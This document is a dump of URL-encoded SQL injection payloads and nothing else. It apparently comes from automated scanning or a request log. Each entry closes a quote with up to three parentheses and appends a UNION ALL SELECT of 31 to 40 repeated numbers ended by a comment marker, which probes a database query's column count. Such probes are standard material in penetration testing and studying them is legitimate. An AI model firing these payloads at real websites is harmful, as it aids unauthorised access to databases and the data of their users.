-1103%27%29%20UNION%20ALL%20SELECT%203624%2C3624%2C3624%2C3624%2C3624%2C3624%2C3624%2C3624%2C3624%2C3624%2C3624%2C3624%2C3624%2C3624%2C3624%2C3624%2C3624%2C3624%2C3624%2C3624%2C3624%2C3624%2C3624%2C3624%2C3624%2C3624%2C3624%2C3624%2C3624%2C3624%2C3624%2C3624%2C3624%2C3624--%20 -6250%27%29%20UNION%20ALL%20SELECT%205097%2C5097%2C5097%2C5097%2C5097%2C5097%2C5097%2C5097%2C5097%2C5097%2C5097%2C5097%2C5097%2C5097%2C5097%2C5097%2C5097%2C5097%2C5097%2C5097%2C5097%2C5097%2C5097%2C5097%2C5097%2C5097%2C5097%2C5097%2C5097%2C5097%2C5097%2C5097%2C5097%2C5097%2C5097--%20 -6291%27%29%20UNION%20ALL%20SELECT%208250%2C8250%2C8250%2C8250%2C8250%2C8250%2C8250%2C8250%2C8250%2C8250%2C8250%2C8250%2C8250%2C8250%2C8250%2C8250%2C8250%2C8250%2C8250%2C8250%2C8250%2C8250%2C8250%2C8250%2C8250%2C8250%2C8250%2C8250%2C8250%2C8250%2C8250%2C8250%2C8250%2C8250%2C8250%2C8250--%20 -3775%27%29%20UNION%20ALL%20SELECT%208324%2C8324%2C8324%2C8324%2C8324%2C8324%2C8324%2C8324%2C8324%2C8324%2C8324%2C8324%2C8324%2C8324%2C8324%2C8324%2C8324%2C8324%2C8324%2C8324%2C8324%2C8324%2C8324%2C8324%2C8324%2C8324%2C8324%2C8324%2C8324%2C8324%2C8324%2C8324%2C8324%2C8324%2C8324%2C8324%2C8324--%20 -5648%27%29%20UNION%20ALL%20SELECT%204430%2C4430%2C4430%2C4430%2C4430%2C4430%2C4430%2C4430%2C4430%2C4430%2C4430%2C4430%2C4430%2C4430%2C4430%2C4430%2C4430%2C4430%2C4430%2C4430%2C4430%2C4430%2C4430%2C4430%2C4430%2C4430%2C4430%2C4430%2C4430%2C4430%2C4430%2C4430%2C4430%2C4430%2C4430%2C4430%2C4430%2C4430--%20 -6543%27%29%20UNION%20ALL%20SELECT%207982%2C7982%2C7982%2C7982%2C7982%2C7982%2C7982%2C7982%2C7982%2C7982%2C7982%2C7982%2C7982%2C7982%2C7982%2C7982%2C7982%2C7982%2C7982%2C7982%2C7982%2C7982%2C7982%2C7982%2C7982%2C7982%2C7982%2C7982%2C7982%2C7982%2C7982%2C7982%2C7982%2C7982%2C7982%2C7982%2C7982%2C7982%2C7982--%20 -6354%27%29%20UNION%20ALL%20SELECT%209920%2C9920%2C9920%2C9920%2C9920%2C9920%2C9920%2C9920%2C9920%2C9920%2C9920%2C9920%2C9920%2C9920%2C9920%2C9920%2C9920%2C9920%2C9920%2C9920%2C9920%2C9920%2C9920%2C9920%2C9920%2C9920%2C9920%2C9920%2C9920%2C9920%2C9920%2C9920%2C9920%2C9920%2C9920%2C9920%2C9920%2C9920%2C9920%2C9920--%20 -4937%27%29%29%20UNION%20ALL%20SELECT%201849%2C1849%2C1849%2C1849%2C1849%2C1849%2C1849%2C1849%2C1849%2C1849%2C1849%2C1849%2C1849%2C1849%2C1849%2C1849%2C1849%2C1849%2C1849%2C1849%2C1849%2C1849%2C1849%2C1849%2C1849%2C1849%2C1849%2C1849%2C1849%2C1849%2C1849--%20 -7773%27%29%29%20UNION%20ALL%20SELECT%202976%2C2976%2C2976%2C2976%2C2976%2C2976%2C2976%2C2976%2C2976%2C2976%2C2976%2C2976%2C2976%2C2976%2C2976%2C2976%2C2976%2C2976%2C2976%2C2976%2C2976%2C2976%2C2976%2C2976%2C2976%2C2976%2C2976%2C2976%2C2976%2C2976%2C2976%2C2976--%20 -2167%27%29%29%20UNION%20ALL%20SELECT%202748%2C2748%2C2748%2C2748%2C2748%2C2748%2C2748%2C2748%2C2748%2C2748%2C2748%2C2748%2C2748%2C2748%2C2748%2C2748%2C2748%2C2748%2C2748%2C2748%2C2748%2C2748%2C2748%2C2748%2C2748%2C2748%2C2748%2C2748%2C2748%2C2748%2C2748%2C2748%2C2748--%20 -5949%27%29%29%20UNION%20ALL%20SELECT%206813%2C6813%2C6813%2C6813%2C6813%2C6813%2C6813%2C6813%2C6813%2C6813%2C6813%2C6813%2C6813%2C6813%2C6813%2C6813%2C6813%2C6813%2C6813%2C6813%2C6813%2C6813%2C6813%2C6813%2C6813%2C6813%2C6813%2C6813%2C6813%2C6813%2C6813%2C6813%2C6813%2C6813--%20 -9934%27%29%29%20UNION%20ALL%20SELECT%201818%2C1818%2C1818%2C1818%2C1818%2C1818%2C1818%2C1818%2C1818%2C1818%2C1818%2C1818%2C1818%2C1818%2C1818%2C1818%2C1818%2C1818%2C1818%2C1818%2C1818%2C1818%2C1818%2C1818%2C1818%2C1818%2C1818%2C1818%2C1818%2C1818%2C1818%2C1818%2C1818%2C1818%2C1818--%20 -3377%27%29%29%20UNION%20ALL%20SELECT%209373%2C9373%2C9373%2C9373%2C9373%2C9373%2C9373%2C9373%2C9373%2C9373%2C9373%2C9373%2C9373%2C9373%2C9373%2C9373%2C9373%2C9373%2C9373%2C9373%2C9373%2C9373%2C9373%2C9373%2C9373%2C9373%2C9373%2C9373%2C9373%2C9373%2C9373%2C9373%2C9373%2C9373%2C9373%2C9373--%20 -8027%27%29%29%20UNION%20ALL%20SELECT%205158%2C5158%2C5158%2C5158%2C5158%2C5158%2C5158%2C5158%2C5158%2C5158%2C5158%2C5158%2C5158%2C5158%2C5158%2C5158%2C5158%2C5158%2C5158%2C5158%2C5158%2C5158%2C5158%2C5158%2C5158%2C5158%2C5158%2C5158%2C5158%2C5158%2C5158%2C5158%2C5158%2C5158%2C5158%2C5158%2C5158--%20 -7175%27%29%29%20UNION%20ALL%20SELECT%204229%2C4229%2C4229%2C4229%2C4229%2C4229%2C4229%2C4229%2C4229%2C4229%2C4229%2C4229%2C4229%2C4229%2C4229%2C4229%2C4229%2C4229%2C4229%2C4229%2C4229%2C4229%2C4229%2C4229%2C4229%2C4229%2C4229%2C4229%2C4229%2C4229%2C4229%2C4229%2C4229%2C4229%2C4229%2C4229%2C4229%2C4229--%20 -1628%27%29%29%20UNION%20ALL%20SELECT%202077%2C2077%2C2077%2C2077%2C2077%2C2077%2C2077%2C2077%2C2077%2C2077%2C2077%2C2077%2C2077%2C2077%2C2077%2C2077%2C2077%2C2077%2C2077%2C2077%2C2077%2C2077%2C2077%2C2077%2C2077%2C2077%2C2077%2C2077%2C2077%2C2077%2C2077%2C2077%2C2077%2C2077%2C2077%2C2077%2C2077%2C2077%2C2077--%20 -1505%27%29%29%20UNION%20ALL%20SELECT%206191%2C6191%2C6191%2C6191%2C6191%2C6191%2C6191%2C6191%2C6191%2C6191%2C6191%2C6191%2C6191%2C6191%2C6191%2C6191%2C6191%2C6191%2C6191%2C6191%2C6191%2C6191%2C6191%2C6191%2C6191%2C6191%2C6191%2C6191%2C6191%2C6191%2C6191%2C6191%2C6191%2C6191%2C6191%2C6191%2C6191%2C6191%2C6191%2C6191--%20 -8538%27%29%29%29%20UNION%20ALL%20SELECT%207426%2C7426%2C7426%2C7426%2C7426%2C7426%2C7426%2C7426%2C7426%2C7426%2C7426%2C7426%2C7426%2C7426%2C7426%2C7426%2C7426%2C7426%2C7426%2C7426%2C7426%2C7426%2C7426%2C7426%2C7426%2C7426%2C7426%2C7426%2C7426%2C7426%2C7426--%20 -4393%27%29%29%29%20UNION%20ALL%20SELECT%204245%2C4245%2C4245%2C4245%2C4245%2C4245%2C4245%2C4245%2C4245%2C4245%2C4245%2C4245%2C4245%2C4245%2C4245%2C4245%2C4245%2C4245%2C4245%2C4245%2C4245%2C4245%2C4245%2C4245%2C4245%2C4245%2C4245%2C4245%2C4245%2C4245%2C4245%2C4245--%20 -6450%27%29%29%29%20UNION%20ALL%20SELECT%206638%2C6638%2C6638%2C6638%2C6638%2C6638%2C6638%2C6638%2C6638%2C6638%2C6638%2C6638%2C6638%2C6638%2C6638%2C6638%2C6638%2C6638%2C6638%2C6638%2C6638%2C6638%2C6638%2C6638%2C6638%2C6638%2C6638%2C6638%2C6638%2C6638%2C6638%2C6638%2C6638--%20 -6084%27%29%29%29%20UNION%20ALL%20SELECT%201907%2C1907%2C1907%2C1907%2C1907%2C1907%2C1907%2C1907%2C1907%2C1907%2C1907%2C1907%2C1907%2C1907%2C1907%2C1907%2C1907%2C1907%2C1907%2C1907%2C1907%2C1907%2C1907%2C1907%2C1907%2C1907%2C1907%2C1907%2C1907%2C1907%2C1907%2C1907%2C1907%2C1907--%20 -7569%27%29%29%29%20UNION%20ALL%20SELECT%205614%2C5614%2C5614%2C5614%2C5614%2C5614%2C5614%2C5614%2C5614%2C5614%2C5614%2C5614%2C5614%2C5614%2C5614%2C5614%2C5614%2C5614%2C5614%2C5614%2C5614%2C5614%2C5614%2C5614%2C5614%2C5614%2C5614%2C5614%2C5614%2C5614%2C5614%2C5614%2C5614%2C5614%2C5614--%20 -3938%27%29%29%29%20UNION%20ALL%20SELECT%207725%2C7725%2C7725%2C7725%2C7725%2C7725%2C7725%2C7725%2C7725%2C7725%2C7725%2C7725%2C7725%2C7725%2C7725%2C7725%2C7725%2C7725%2C7725%2C7725%2C7725%2C7725%2C7725%2C7725%2C7725%2C7725%2C7725%2C7725%2C7725%2C7725%2C7725%2C7725%2C7725%2C7725%2C7725%2C7725--%20 -1129%27%29%29%29%20UNION%20ALL%20SELECT%208773%2C8773%2C8773%2C8773%2C8773%2C8773%2C8773%2C8773%2C8773%2C8773%2C8773%2C8773%2C8773%2C8773%2C8773%2C8773%2C8773%2C8773%2C8773%2C8773%2C8773%2C8773%2C8773%2C8773%2C8773%2C8773%2C8773%2C8773%2C8773%2C8773%2C8773%2C8773%2C8773%2C8773%2C8773%2C8773%2C8773--%20 -6038%27%29%29%29%20UNION%20ALL%20SELECT%203515%2C3515%2C3515%2C3515%2C3515%2C3515%2C3515%2C3515%2C3515%2C3515%2C3515%2C3515%2C3515%2C3515%2C3515%2C3515%2C3515%2C3515%2C3515%2C3515%2C3515%2C3515%2C3515%2C3515%2C3515%2C3515%2C3515%2C3515%2C3515%2C3515%2C3515%2C3515%2C3515%2C3515%2C3515%2C3515%2C3515%2C3515--%20 -6373%27%29%29%29%20UNION%20ALL%20SELECT%207946%2C7946%2C7946%2C7946%2C7946%2C7946%2C7946%2C7946%2C7946%2C7946%2C7946%2C7946%2C7946%2C7946%2C7946%2C7946%2C7946%2C7946%2C7946%2C7946%2C7946%2C7946%2C7946%2C7946%2C7946%2C7946%2C7946%2C7946%2C7946%2C7946%2C7946%2C7946%2C7946%2C7946%2C7946%2C7946%2C7946%2C7946%2C7946--%20 -6801%27%29%29%29%20UNION%20ALL%20SELECT%201324%2C1324%2C1324%2C1324%2C1324%2C1324%2C1324%2C1324%2C1324%2C1324%2C1324%2C1324%2C1324%2C1324%2C1324%2C1324%2C1324%2C1324%2C1324%2C1324%2C1324%2C1324%2C1324%2C1324%2C1324%2C1324%2C1324%2C1324%2C1324%2C1324%2C1324%2C1324%2C1324%2C1324%2C1324%2C1324%2C1324%2C1324%2C1324%2C1324--%20 -4906%27%20UNION%20ALL%20SELECT%207483%2C7483%2C7483%2C7483%2C7483%2C7483%2C7483%2C7483%2C7483%2C7483%2C7483%2C7483%2C7483%2C7483%2C7483%2C7483%2C7483%2C7483%2C7483%2C7483%2C7483%2C7483%2C7483%2C7483%2C7483%2C7483%2C7483%2C7483%2C7483%2C7483%2C7483--%20 -3426%27%20UNION%20ALL%20SELECT%209784%2C9784%2C9784%2C9784%2C9784%2C9784%2C9784%2C9784%2C9784%2C9784%2C9784%2C9784%2C9784%2C9784%2C9784%2C9784%2C9784%2C9784%2C9784%2C9784%2C9784%2C9784%2C9784%2C9784%2C9784%2C9784%2C9784%2C9784%2C9784%2C9784%2C9784%2C9784--%20 -8338%27%20UNION%20ALL%20SELECT%207843%2C7843%2C7843%2C7843%2C7843%2C7843%2C7843%2C7843%2C7843%2C7843%2C7843%2C7843%2C7843%2C7843%2C7843%2C7843%2C7843%2C7843%2C7843%2C7843%2C7843%2C7843%2C7843%2C7843%2C7843%2C7843%2C7843%2C7843%2C7843%2C7843%2C7843%2C7843%2C7843--%20 -2877%27%20UNION%20ALL%20SELECT%207335%2C7335%2C7335%2C7335%2C7335%2C7335%2C7335%2C7335%2C7335%2C7335%2C7335%2C7335%2C7335%2C7335%2C7335%2C7335%2C7335%2C7335%2C7335%2C7335%2C7335%2C7335%2C7335%2C7335%2C7335%2C7335%2C7335%2C7335%2C7335%2C7335%2C7335%2C7335%2C7335%2C7335--%20 -3109%27%20UNION%20ALL%20SELECT%207959%2C7959%2C7959%2C7959%2C7959%2C7959%2C7959%2C7959%2C7959%2C7959%2C7959%2C7959%2C7959%2C7959%2C7959%2C7959%2C7959%2C7959%2C7959%2C7959%2C7959%2C7959%2C7959%2C7959%2C7959%2C7959%2C7959%2C7959%2C7959%2C7959%2C7959%2C7959%2C7959%2C7959%2C7959--%20 -2983%27%20UNION%20ALL%20SELECT%203702%2C3702%2C3702%2C3702%2C3702%2C3702%2C3702%2C3702%2C3702%2C3702%2C3702%2C3702%2C3702%2C3702%2C3702%2C3702%2C3702%2C3702%2C3702%2C3702%2C3702%2C3702%2C3702%2C3702%2C3702%2C3702%2C3702%2C3702%2C3702%2C3702%2C3702%2C3702%2C3702%2C3702%2C3702%2C3702--%20 -5130%27%20UNION%20ALL%20SELECT%209714%2C9714%2C9714%2C9714%2C9714%2C9714%2C9714%2C9714%2C9714%2C9714%2C9714%2C9714%2C9714%2C9714%2C9714%2C9714%2C9714%2C9714%2C9714%2C9714%2C9714%2C9714%2C9714%2C9714%2C9714%2C9714%2C9714%2C9714%2C9714%2C9714%2C9714%2C9714%2C9714%2C9714%2C9714%2C9714%2C9714--%20 -6040%27%20UNION%20ALL%20SELECT%201705%2C1705%2C1705%2C1705%2C1705%2C1705%2C1705%2C1705%2C1705%2C1705%2C1705%2C1705%2C1705%2C1705%2C1705%2C1705%2C1705%2C1705%2C1705%2C1705%2C1705%2C1705%2C1705%2C1705%2C1705%2C1705%2C1705%2C1705%2C1705%2C1705%2C1705%2C1705%2C1705%2C1705%2C1705%2C1705%2C1705%2C1705--%20 -9764%27%20UNION%20ALL%20SELECT%203455%2C3455%2C3455%2C3455%2C3455%2C3455%2C3455%2C3455%2C3455%2C3455%2C3455%2C3455%2C3455%2C3455%2C3455%2C3455%2C3455%2C3455%2C3455%2C3455%2C3455%2C3455%2C3455%2C3455%2C3455%2C3455%2C3455%2C3455%2C3455%2C3455%2C3455%2C3455%2C3455%2C3455%2C3455%2C3455%2C3455%2C3455%2C3455--%20 -2754%27%20UNION%20ALL%20SELECT%205978%2C5978%2C5978%2C5978%2C5978%2C5978%2C5978%2C5978%2C5978%2C5978%2C5978%2C5978%2C5978%2C5978%2C5978%2C5978%2C5978%2C5978%2C5978%2C5978%2C5978%2C5978%2C5978%2C5978%2C5978%2C5978%2C5978%2C5978%2C5978%2C5978%2C5978%2C5978%2C5978%2C5978%2C5978%2C5978%2C5978%2C5978%2C5978%2C5978--%20 -2540%27%29%20UNION%20ALL%20SELECT%201844%2C1844%2C1844%2C1844%2C1844%2C1844%2C1844%2C1844%2C1844%2C1844%2C1844%2C1844%2C1844%2C1844%2C1844%2C1844%2C1844%2C1844%2C1844%2C1844%2C1844%2C1844%2C1844%2C1844%2C1844%2C1844%2C1844%2C1844%2C1844%2C1844%2C1844--%20 -4906%27%29%20UNION%20ALL%20SELECT%207574%2C7574%2C7574%2C7574%2C7574%2C7574%2C7574%2C7574%2C7574%2C7574%2C7574%2C7574%2C7574%2C7574%2C7574%2C7574%2C7574%2C7574%2C7574%2C7574%2C7574%2C7574%2C7574%2C7574%2C7574%2C7574%2C7574%2C7574%2C7574%2C7574%2C7574%2C7574--%20 -7149%27%29%20UNION%20ALL%20SELECT%207564%2C7564%2C7564%2C7564%2C7564%2C7564%2C7564%2C7564%2C7564%2C7564%2C7564%2C7564%2C7564%2C7564%2C7564%2C7564%2C7564%2C7564%2C7564%2C7564%2C7564%2C7564%2C7564%2C7564%2C7564%2C7564%2C7564%2C7564%2C7564%2C7564%2C7564%2C7564%2C7564--%20 -7735%27%29%20UNION%20ALL%20SELECT%208441%2C8441%2C8441%2C8441%2C8441%2C8441%2C8441%2C8441%2C8441%2C8441%2C8441%2C8441%2C8441%2C8441%2C8441%2C8441%2C8441%2C8441%2C8441%2C8441%2C8441%2C8441%2C8441%2C8441%2C8441%2C8441%2C8441%2C8441%2C8441%2C8441%2C8441%2C8441%2C8441%2C8441--%20 -4067%27%29%20UNION%20ALL%20SELECT%205095%2C5095%2C5095%2C5095%2C5095%2C5095%2C5095%2C5095%2C5095%2C5095%2C5095%2C5095%2C5095%2C5095%2C5095%2C5095%2C5095%2C5095%2C5095%2C5095%2C5095%2C5095%2C5095%2C5095%2C5095%2C5095%2C5095%2C5095%2C5095%2C5095%2C5095%2C5095%2C5095%2C5095%2C5095--%20 -8407%27%29%20UNION%20ALL%20SELECT%209642%2C9642%2C9642%2C9642%2C9642%2C9642%2C9642%2C9642%2C9642%2C9642%2C9642%2C9642%2C9642%2C9642%2C9642%2C9642%2C9642%2C9642%2C9642%2C9642%2C9642%2C9642%2C9642%2C9642%2C9642%2C9642%2C9642%2C9642%2C9642%2C9642%2C9642%2C9642%2C9642%2C9642%2C9642%2C9642--%20 -7859%27%29%20UNION%20ALL%20SELECT%209991%2C9991%2C9991%2C9991%2C9991%2C9991%2C9991%2C9991%2C9991%2C9991%2C9991%2C9991%2C9991%2C9991%2C9991%2C9991%2C9991%2C9991%2C9991%2C9991%2C9991%2C9991%2C9991%2C9991%2C9991%2C9991%2C9991%2C9991%2C9991%2C9991%2C9991%2C9991%2C9991%2C9991%2C9991%2C9991%2C9991--%20 -6693%27%29%20UNION%20ALL%20SELECT%205236%2C5236%2C5236%2C5236%2C5236%2C5236%2C5236%2C5236%2C5236%2C5236%2C5236%2C5236%2C5236%2C5236%2C5236%2C5236%2C5236%2C5236%2C5236%2C5236%2C5236%2C5236%2C5236%2C5236%2C5236%2C5236%2C5236%2C5236%2C5236%2C5236%2C5236%2C5236%2C5236%2C5236%2C5236%2C5236%2C5236%2C5236--%20 -8430%27%29%20UNION%20ALL%20SELECT%202409%2C2409%2C2409%2C2409%2C2409%2C2409%2C2409%2C2409%2C2409%2C2409%2C2409%2C2409%2C2409%2C2409%2C2409%2C2409%2C2409%2C2409%2C2409%2C2409%2C2409%2C2409%2C2409%2C2409%2C2409%2C2409%2C2409%2C2409%2C2409%2C2409%2C2409%2C2409%2C2409%2C2409%2C2409%2C2409%2C2409%2C2409%2C2409--%20 -4654%27%29%20UNION%20ALL%20SELECT%201036%2C1036%2C1036%2C1036%2C1036%2C1036%2C1036%2C1036%2C1036%2C1036%2C1036%2C1036%2C1036%2C1036%2C1036%2C1036%2C1036%2C1036%2C1036%2C1036%2C1036%2C1036%2C1036%2C1036%2C1036%2C1036%2C1036%2C1036%2C1036%2C1036%2C1036%2C1036%2C1036%2C1036%2C1036%2C1036%2C1036%2C1036%2C1036%2C1036--%20 -3910%27%29%29%20UNION%20ALL%20SELECT%202363%2C2363%2C2363%2C2363%2C2363%2C2363%2C2363%2C2363%2C2363%2C2363%2C2363%2C2363%2C2363%2C2363%2C2363%2C2363%2C2363%2C2363%2C2363%2C2363%2C2363%2C2363%2C2363%2C2363%2C2363%2C2363%2C2363%2C2363%2C2363%2C2363%2C2363--%20 -5197%27%29%29%20UNION%20ALL%20SELECT%201567%2C1567%2C1567%2C1567%2C1567%2C1567%2C1567%2C1567%2C1567%2C1567%2C1567%2C1567%2C1567%2C1567%2C1567%2C1567%2C1567%2C1567%2C1567%2C1567%2C1567%2C1567%2C1567%2C1567%2C1567%2C1567%2C1567%2C1567%2C1567%2C1567%2C1567%2C1567--%20 -4209%27%29%29%20UNION%20ALL%20SELECT%202080%2C2080%2C2080%2C2080%2C2080%2C2080%2C2080%2C2080%2C2080%2C2080%2C2080%2C2080%2C2080%2C2080%2C2080%2C2080%2C2080%2C2080%2C2080%2C2080%2C2080%2C2080%2C2080%2C2080%2C2080%2C2080%2C2080%2C2080%2C2080%2C2080%2C2080%2C2080%2C2080--%20 -1589%27%29%29%20UNION%20ALL%20SELECT%209359%2C9359%2C9359%2C9359%2C9359%2C9359%2C9359%2C9359%2C9359%2C9359%2C9359%2C9359%2C9359%2C9359%2C9359%2C9359%2C9359%2C9359%2C9359%2C9359%2C9359%2C9359%2C9359%2C9359%2C9359%2C9359%2C9359%2C9359%2C9359%2C9359%2C9359%2C9359%2C9359%2C9359--%20 -3086%27%29%29%20UNION%20ALL%20SELECT%201925%2C1925%2C1925%2C1925%2C1925%2C1925%2C1925%2C1925%2C1925%2C1925%2C1925%2C1925%2C1925%2C1925%2C1925%2C1925%2C1925%2C1925%2C1925%2C1925%2C1925%2C1925%2C1925%2C1925%2C1925%2C1925%2C1925%2C1925%2C1925%2C1925%2C1925%2C1925%2C1925%2C1925%2C1925--%20 -1254%27%29%29%20UNION%20ALL%20SELECT%203477%2C3477%2C3477%2C3477%2C3477%2C3477%2C3477%2C3477%2C3477%2C3477%2C3477%2C3477%2C3477%2C3477%2C3477%2C3477%2C3477%2C3477%2C3477%2C3477%2C3477%2C3477%2C3477%2C3477%2C3477%2C3477%2C3477%2C3477%2C3477%2C3477%2C3477%2C3477%2C3477%2C3477%2C3477%2C3477--%20 -8099%27%29%29%20UNION%20ALL%20SELECT%208784%2C8784%2C8784%2C8784%2C8784%2C8784%2C8784%2C8784%2C8784%2C8784%2C8784%2C8784%2C8784%2C8784%2C8784%2C8784%2C8784%2C8784%2C8784%2C8784%2C8784%2C8784%2C8784%2C8784%2C8784%2C8784%2C8784%2C8784%2C8784%2C8784%2C8784%2C8784%2C8784%2C8784%2C8784%2C8784%2C8784--%20 -6690%27%29%29%20UNION%20ALL%20SELECT%208743%2C8743%2C8743%2C8743%2C8743%2C8743%2C8743%2C8743%2C8743%2C8743%2C8743%2C8743%2C8743%2C8743%2C8743%2C8743%2C8743%2C8743%2C8743%2C8743%2C8743%2C8743%2C8743%2C8743%2C8743%2C8743%2C8743%2C8743%2C8743%2C8743%2C8743%2C8743%2C8743%2C8743%2C8743%2C8743%2C8743%2C8743--%20 -3028%27%29%29%20UNION%20ALL%20SELECT%205400%2C5400%2C5400%2C5400%2C5400%2C5400%2C5400%2C5400%2C5400%2C5400%2C5400%2C5400%2C5400%2C5400%2C5400%2C5400%2C5400%2C5400%2C5400%2C5400%2C5400%2C5400%2C5400%2C5400%2C5400%2C5400%2C5400%2C5400%2C5400%2C5400%2C5400%2C5400%2C5400%2C5400%2C5400%2C5400%2C5400%2C5400%2C5400--%20 -5657%27%29%29%20UNION%20ALL%20SELECT%202407%2C2407%2C2407%2C2407%2C2407%2C2407%2C2407%2C2407%2C2407%2C2407%2C2407%2C2407%2C2407%2C2407%2C2407%2C2407%2C2407%2C2407%2C2407%2C2407%2C2407%2C2407%2C2407%2C2407%2C2407%2C2407%2C2407%2C2407%2C2407%2C2407%2C2407%2C2407%2C2407%2C2407%2C2407%2C2407%2C2407%2C2407%2C2407%2C2407--%20 -7182%27%29%29%29%20UNION%20ALL%20SELECT%209504%2C9504%2C9504%2C9504%2C9504%2C9504%2C9504%2C9504%2C9504%2C9504%2C9504%2C9504%2C9504%2C9504%2C9504%2C9504%2C9504%2C9504%2C9504%2C9504%2C9504%2C9504%2C9504%2C9504%2C9504%2C9504%2C9504%2C9504%2C9504%2C9504%2C9504--%20 -2700%27%29%29%29%20UNION%20ALL%20SELECT%209805%2C9805%2C9805%2C9805%2C9805%2C9805%2C9805%2C9805%2C9805%2C9805%2C9805%2C9805%2C9805%2C9805%2C9805%2C9805%2C9805%2C9805%2C9805%2C9805%2C9805%2C9805%2C9805%2C9805%2C9805%2C9805%2C9805%2C9805%2C9805%2C9805%2C9805%2C9805--%20 -2730%27%29%29%29%20UNION%20ALL%20SELECT%206121%2C6121%2C6121%2C6121%2C6121%2C6121%2C6121%2C6121%2C6121%2C6121%2C6121%2C6121%2C6121%2C6121%2C6121%2C6121%2C6121%2C6121%2C6121%2C6121%2C6121%2C6121%2C6121%2C6121%2C6121%2C6121%2C6121%2C6121%2C6121%2C6121%2C6121%2C6121%2C6121--%20 -7072%27%29%29%29%20UNION%20ALL%20SELECT%208053%2C8053%2C8053%2C8053%2C8053%2C8053%2C8053%2C8053%2C8053%2C8053%2C8053%2C8053%2C8053%2C8053%2C8053%2C8053%2C8053%2C8053%2C8053%2C8053%2C8053%2C8053%2C8053%2C8053%2C8053%2C8053%2C8053%2C8053%2C8053%2C8053%2C8053%2C8053%2C8053%2C8053--%20 -9396%27%29%29%29%20UNION%20ALL%20SELECT%201730%2C1730%2C1730%2C1730%2C1730%2C1730%2C1730%2C1730%2C1730%2C1730%2C1730%2C1730%2C1730%2C1730%2C1730%2C1730%2C1730%2C1730%2C1730%2C1730%2C1730%2C1730%2C1730%2C1730%2C1730%2C1730%2C1730%2C1730%2C1730%2C1730%2C1730%2C1730%2C1730%2C1730%2C1730--%20 -7885%27%29%29%29%20UNION%20ALL%20SELECT%209456%2C9456%2C9456%2C9456%2C9456%2C9456%2C9456%2C9456%2C9456%2C9456%2C9456%2C9456%2C9456%2C9456%2C9456%2C9456%2C9456%2C9456%2C9456%2C9456%2C9456%2C9456%2C9456%2C9456%2C9456%2C9456%2C9456%2C9456%2C9456%2C9456%2C9456%2C9456%2C9456%2C9456%2C9456%2C9456--%20 -3322%27%29%29%29%20UNION%20ALL%20SELECT%204875%2C4875%2C4875%2C4875%2C4875%2C4875%2C4875%2C4875%2C4875%2C4875%2C4875%2C4875%2C4875%2C4875%2C4875%2C4875%2C4875%2C4875%2C4875%2C4875%2C4875%2C4875%2C4875%2C4875%2C4875%2C4875%2C4875%2C4875%2C4875%2C4875%2C4875%2C4875%2C4875%2C4875%2C4875%2C4875%2C4875--%20 -5355%27%29%29%29%20UNION%20ALL%20SELECT%202181%2C2181%2C2181%2C2181%2C2181%2C2181%2C2181%2C2181%2C2181%2C2181%2C2181%2C2181%2C2181%2C2181%2C2181%2C2181%2C2181%2C2181%2C2181%2C2181%2C2181%2C2181%2C2181%2C2181%2C2181%2C2181%2C2181%2C2181%2C2181%2C2181%2C2181%2C2181%2C2181%2C2181%2C2181%2C2181%2C2181%2C2181--%20 -8212%27%29%29%29%20UNION%20ALL%20SELECT%206299%2C6299%2C6299%2C6299%2C6299%2C6299%2C6299%2C6299%2C6299%2C6299%2C6299%2C6299%2C6299%2C6299%2C6299%2C6299%2C6299%2C6299%2C6299%2C6299%2C6299%2C6299%2C6299%2C6299%2C6299%2C6299%2C6299%2C6299%2C6299%2C6299%2C6299%2C6299%2C6299%2C6299%2C6299%2C6299%2C6299%2C6299%2C6299--%20 -1820%27%29%29%29%20UNION%20ALL%20SELECT%208164%2C8164%2C8164%2C8164%2C8164%2C8164%2C8164%2C8164%2C8164%2C8164%2C8164%2C8164%2C8164%2C8164%2C8164%2C8164%2C8164%2C8164%2C8164%2C8164%2C8164%2C8164%2C8164%2C8164%2C8164%2C8164%2C8164%2C8164%2C8164%2C8164%2C8164%2C8164%2C8164%2C8164%2C8164%2C8164%2C8164%2C8164%2C8164%2C8164--%20 -8976%27%20UNION%20ALL%20SELECT%203453%2C3453%2C3453%2C3453%2C3453%2C3453%2C3453%2C3453%2C3453%2C3453%2C3453%2C3453%2C3453%2C3453%2C3453%2C3453%2C3453%2C3453%2C3453%2C3453%2C3453%2C3453%2C3453%2C3453%2C3453%2C3453%2C3453%2C3453%2C3453%2C3453%2C3453--%20 -1380%27%20UNION%20ALL%20SELECT%209191%2C9191%2C9191%2C9191%2C9191%2C9191%2C9191%2C9191%2C9191%2C9191%2C9191%2C9191%2C9191%2C9191%2C9191%2C9191%2C9191%2C9191%2C9191%2C9191%2C9191%2C9191%2C9191%2C9191%2C9191%2C9191%2C9191%2C9191%2C9191%2C9191%2C9191%2C9191--%20 -7363%27%20UNION%20ALL%20SELECT%208373%2C8373%2C8373%2C8373%2C8373%2C8373%2C8373%2C8373%2C8373%2C8373%2C8373%2C8373%2C8373%2C8373%2C8373%2C8373%2C8373%2C8373%2C8373%2C8373%2C8373%2C8373%2C8373%2C8373%2C8373%2C8373%2C8373%2C8373%2C8373%2C8373%2C8373%2C8373%2C8373--%20 -4501%27%20UNION%20ALL%20SELECT%202326%2C2326%2C2326%2C2326%2C2326%2C2326%2C2326%2C2326%2C2326%2C2326%2C2326%2C2326%2C2326%2C2326%2C2326%2C2326%2C2326%2C2326%2C2326%2C2326%2C2326%2C2326%2C2326%2C2326%2C2326%2C2326%2C2326%2C2326%2C2326%2C2326%2C2326%2C2326%2C2326%2C2326--%20 -9175%27%20UNION%20ALL%20SELECT%209774%2C9774%2C9774%2C9774%2C9774%2C9774%2C9774%2C9774%2C9774%2C9774%2C9774%2C9774%2C9774%2C9774%2C9774%2C9774%2C9774%2C9774%2C9774%2C9774%2C9774%2C9774%2C9774%2C9774%2C9774%2C9774%2C9774%2C9774%2C9774%2C9774%2C9774%2C9774%2C9774%2C9774%2C9774--%20 -8644%27%20UNION%20ALL%20SELECT%203262%2C3262%2C3262%2C3262%2C3262%2C3262%2C3262%2C3262%2C3262%2C3262%2C3262%2C3262%2C3262%2C3262%2C3262%2C3262%2C3262%2C3262%2C3262%2C3262%2C3262%2C3262%2C3262%2C3262%2C3262%2C3262%2C3262%2C3262%2C3262%2C3262%2C3262%2C3262%2C3262%2C3262%2C3262%2C3262--%20 